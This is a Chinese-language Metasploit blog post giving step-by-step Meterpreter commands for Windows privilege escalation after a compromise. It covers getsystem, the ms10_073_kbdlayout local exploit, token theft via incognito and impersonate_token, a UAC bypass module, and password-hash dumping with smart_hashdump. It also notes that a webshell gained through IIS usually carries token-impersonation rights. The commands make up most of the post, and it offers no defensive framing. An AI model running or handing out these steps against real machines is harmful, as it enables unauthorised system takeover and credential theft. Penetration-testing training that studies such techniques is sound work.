meterpreter提权几种方式

由于很多人都想知道meterpreter提权是怎么样的?这里就再简单的说一下吧!

反弹shell

 

一、getsystem提权

直接getsystem提权,最常用简单的办法;不过对于现在用的Metasploit Framework来说,此命令已经不好用了,会出现“Unknown command: getsystem.”,然后再用命令“use priv",又会出现“Failed to load extension: No module of the name priv found”。

meterpreter > getsystem

 

二、exp提权

很多人可能不知道什么是exp提权?特意简单的说一下:溢出提权,也就是exp提权。

以windows举例,溢出提权说白了,就是我们windows系统中出现的一些漏洞,漏洞的种类很多,所以大家在日常生活中,要经常对电脑更新补丁啊!而我们利用这些系统中存在的漏洞写出的 exp ,也就是漏洞利用工具,然后来辅助提权。

meterpreter > background //先后台运行会话[*] Backgrounding session 1…
msf > use post/windows/escalate/ms10_073_kbdlayout
msf > show options
msf > set session 1 //设置要使用的会话
msf post(ms10_073_kbdlayout) > exploit

注意:如果创建了一个system进程,就可以立马sessions 1进入会话,然后ps查看进程,使用migrate   pid注入到进程。不过,现在用的Metasploit Framewor使用“migrate”命令会出现“Error running command migrate: NoMethodError undefined method `pid' for nil:NilClass”的提示。

 

或者直接使用以下命令:

meterpreter > run post/windows/escalate/ms10_073_kbdlayout

 

三、盗取令牌

meterpreter > use incognito //进入这个模块
meterpreter > list_tokens –u //查看存在的令牌
meterpreter > impersonate_token NT AUTXXXX\SYSTEM //令牌是DelegationTokens一列,getuid查看,两个斜杠

注意:只有具有“模仿安全令牌权限”的账户才能去模仿别人的令牌,一般大多数的服务型账户(IIS、MSSQL等)有这个权限,大多数用户级的账户没有这个权限。一般从web拿到的webshell都是IIS服务器权限,是具有这个模仿权限的,建好的账户没有这个权限。使用菜刀(IIS服务器权限)反弹meterpreter是服务型权限。

 

四、Bypassuac

msf > use exploit/windows/local/bypassuac //32位与64位一样,其他几个模块也一样
msf > show options
msf > set session 4
msf > run //成功后会返回一个新的session,进入新会话,发现权限没变,使用getsystem即可完成提权

 

五、Hash

meterpreter > run post/windows/gather/smart_hashdump //读取hash这种做法最智能,效果最好。

 

总结:提权的方式真的是太多了,而且还有windows提权和linux提权,方法也各有不同。

    A+
发布日期:2019年04月12日 13:08:16  所属分类:Metasploit
最后更新时间:2019-04-12 21:45:16
付杰
  • ¥ 199.0元
  • 市场价:199.0元
  • ¥ 999.0元
  • 市场价:1599.0元
  • ¥ 89.0元
  • 市场价:129.0元
  • ¥ 298.0元
  • 市场价:598.0元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: